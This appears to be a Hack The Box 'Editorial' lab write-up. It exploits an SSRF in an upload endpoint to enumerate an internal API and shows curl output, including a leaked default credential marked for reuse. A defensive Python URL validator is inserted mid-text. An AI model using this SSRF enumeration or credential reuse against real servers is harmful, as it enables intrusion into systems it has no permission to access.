SSRF
SSRF has been identified and confirmed in the bookurl parameter of the /upload endpoint of the target web application. The /upload page sends a POST request to the /upload-cover endpoint containing the user-supplied URL, and the server fetches that URL without any form of input validation, allowing access to internal web services.
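The weakness above is a server-side fetch that accepts any URL the user supplies. As an added illustration (not code from the target application), the following Python validator shows the checks such a fetch should perform before connecting: restrict the scheme and port, resolve the hostname once, reject loopback, private, link-local, IPv4-mapped and multicast addresses, and hand the pinned IP back to the caller. The function names and the FAKE_DNS table are assumptions constructed for this example so it runs offline.

```python
import ipaddress
import socket
from typing import Callable, Tuple
from urllib.parse import urlparse

# Only plain web fetches of remote cover images are legitimate for this feature.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class UnsafeURL(ValueError):
    """Raised when a user-supplied URL must not be fetched server-side."""


def _to_checked_ip(raw: str):
    """Parse an address literal, unwrapping IPv4-mapped IPv6 (::ffff:127.0.0.1)."""
    ip = ipaddress.ip_address(raw)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip


def _is_public_address(ip) -> bool:
    # is_global already rejects RFC 1918, loopback, link-local (169.254/16, fe80::/10),
    # CGNAT, documentation and reserved ranges; multicast is excluded separately.
    return ip.is_global and not ip.is_multicast


def check_cover_url(url: str,
                    resolve: Callable[[str], str] = socket.gethostbyname
                    ) -> Tuple[str, str, int]:
    """Validate a user-supplied URL; return (host, pinned_ip, port) or raise UnsafeURL."""
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parsed.scheme!r}")
    host = parsed.hostname
    if not host:
        raise UnsafeURL("URL has no host")
    try:
        port = parsed.port
    except ValueError as exc:
        raise UnsafeURL("malformed port") from exc
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port not allowed: {port}")
    try:
        ip = _to_checked_ip(host)            # host given as an IP literal
    except ValueError:
        try:
            ip = _to_checked_ip(resolve(host))  # resolve exactly once, then pin
        except (OSError, ValueError) as exc:
            raise UnsafeURL(f"cannot resolve {host!r}") from exc
    if not _is_public_address(ip):
        raise UnsafeURL(f"{host!r} resolves to non-public address {ip}")
    return host, str(ip), port


def is_safe_cover_url(url: str, resolve: Callable[[str], str] = socket.gethostbyname) -> bool:
    """Boolean convenience wrapper around check_cover_url."""
    try:
        check_cover_url(url, resolve)
        return True
    except UnsafeURL:
        return False


# Constructed resolver table standing in for DNS so the example runs offline.
FAKE_DNS = {
    "localhost": "127.0.0.1",
    "covers.example.com": "93.184.216.34",  # constructed public address
    "internal-api.corp": "10.0.0.5",        # constructed private address
}


def fake_resolve(host: str) -> str:
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"no fake record for {host}")


if __name__ == "__main__":
    for candidate in ("https://covers.example.com/book.jpg",
                      "http://127.0.0.1:5000/api/latest/metadata",
                      "http://localhost/",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://[::ffff:127.0.0.1]/",
                      "ftp://covers.example.com/book.jpg"):
        print(f"{candidate:50} -> {'allow' if is_safe_cover_url(candidate, fake_resolve) else 'block'}")
```

The validator returns the resolved IP so the fetch layer can connect to that exact address (sending the original Host header) instead of resolving again, which closes the DNS-rebinding window; the fetch should also refuse to follow redirects, since a redirect to an internal address would otherwise bypass every check above.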
API Service
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/fa7e7526-0cfb-4939-a8b6-48b983ed4392
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:01:35 GMT
Content-Type: application/octet-stream
Content-Length: 911
Connection: keep-alive
Content-Disposition: inline; filename=fa7e7526-0cfb-4939-a8b6-48b983ed4392
Last-Modified: Thu, 20 Jun 2024 14:01:05 GMT
Cache-Control: no-cache
ETag: "1718892065.9960847-911-4165933148"
{
"messages": [
{
"promotions": {
"description": "Retrieve a list of all the promotions in our library.",
"endpoint": "/api/latest/metadata/messages/promos",
"methods": "GET"
}
},
{
"coupons": {
"description": "Retrieve the list of coupons to use in our library.",
"endpoint": "/api/latest/metadata/messages/coupons",
"methods": "GET"
}
},
{
"new_authors": {
"description": "Retrieve the welcome message sended to our new authors.",
"endpoint": "/api/latest/metadata/messages/authors",
"methods": "GET"
}
},
{
"platform_use": {
"description": "Retrieve examples of how to use the platform.",
"endpoint": "/api/latest/metadata/messages/how_to_use_platform",
"methods": "GET"
}
}
],
"version": [
{
"changelog": {
"description": "Retrieve a list of all the versions and updates of the api.",
"endpoint": "/api/latest/metadata/changelog",
"methods": "GET"
}
},
{
"latest": {
"description": "Retrieve the last version of api.",
"endpoint": "/api/latest/metadata",
"methods": "GET"
}
}
]
}
While nothing appears to be listening on port 80 internally, an API service was discovered on internal port 5000 while port-scanning through the SSRF. Its index response, shown above, lists the available metadata endpoints.
promotions
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/5ab31110-6bc3-4286-93f4-38171ccc903e
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:52:54 GMT
Content-Type: application/octet-stream
Content-Length: 207
Connection: keep-alive
Content-Disposition: inline; filename=5ab31110-6bc3-4286-93f4-38171ccc903e
Last-Modified: Thu, 20 Jun 2024 14:52:50 GMT
Cache-Control: no-cache
ETag: "1718895170.2642004-207-3865909207"
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
The API endpoint /api/latest/metadata/messages/promos does not appear to be functional.
coupons
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/0aa25044-030c-4701-bf08-2cd3106b0e59
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:48:53 GMT
Content-Type: application/octet-stream
Content-Length: 194
Connection: keep-alive
Content-Disposition: inline; filename=0aa25044-030c-4701-bf08-2cd3106b0e59
Last-Modified: Thu, 20 Jun 2024 14:48:48 GMT
Cache-Control: no-cache
ETag: "1718894928.3201916-194-3836024766"
[{"2anniversaryTWOandFOURread4":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"12/02/2024"}},{"frEsh11bookS230":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"31/11/2023"}}]
The API endpoint /api/latest/metadata/messages/coupons returns two coupon codes. These may be reused later.
new_authors
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/12d04490-66a8-43ad-8cc7-9b32b73fe233
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:57:21 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: keep-alive
Content-Disposition: inline; filename=12d04490-66a8-43ad-8cc7-9b32b73fe233
Last-Modified: Thu, 20 Jun 2024 14:57:17 GMT
Cache-Control: no-cache
ETag: "1718895437.1002104-506-3895400464"
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
The API endpoint /api/latest/metadata/messages/authors returns a welcome message containing a default credential for the organization: dev:dev080217_devAPI!@
The credential must be checked for reuse.
platform_use
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/3df98e34-bbed-41f2-9511-d606c559d464
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 15:01:25 GMT
Content-Type: application/octet-stream
Content-Length: 207
Connection: keep-alive
Content-Disposition: inline; filename=3df98e34-bbed-41f2-9511-d606c559d464
Last-Modified: Thu, 20 Jun 2024 15:01:19 GMT
Cache-Control: no-cache
ETag: "1718895679.9562194-207-4199553103"
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
The API endpoint /api/latest/metadata/messages/how_to_use_platform isn't functional.
version
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/cdb73ced-d624-4f72-9577-e70dbf10a575
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 15:02:35 GMT
Content-Type: application/octet-stream
Content-Length: 618
Connection: keep-alive
Content-Disposition: inline; filename=cdb73ced-d624-4f72-9577-e70dbf10a575
Last-Modified: Thu, 20 Jun 2024 15:02:31 GMT
Cache-Control: no-cache
ETag: "1718895751.5042222-618-18487468"
[{"1":{"api_route":"/api/v1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial El Tiempo Por Arriba"}},{"1.1":{"api_route":"/api/v1.1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Ed Tiempo Arriba"}},{"1.2":{"contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v1.2/metadata/"}},{"2":{"contact_email":"info@tiempoarriba.moc.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v2/metadata/"}}]
The API endpoint /api/latest/metadata/changelog reveals version information. Another version of the API service appears to exist at /api/v2; after several tests, it is concluded that none of the listed versioned routes are available.
latest
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/4557cd33-9eec-4ec8-a946-dbb7c561d0e2
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 15:04:21 GMT
Content-Type: application/octet-stream
Content-Length: 207
Connection: keep-alive
Content-Disposition: inline; filename=4557cd33-9eec-4ec8-a946-dbb7c561d0e2
Last-Modified: Thu, 20 Jun 2024 15:04:18 GMT
Cache-Control: no-cache
ETag: "1718895858.400226-207-4197325020"
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
The /api/latest/metadata API endpoint is not functional.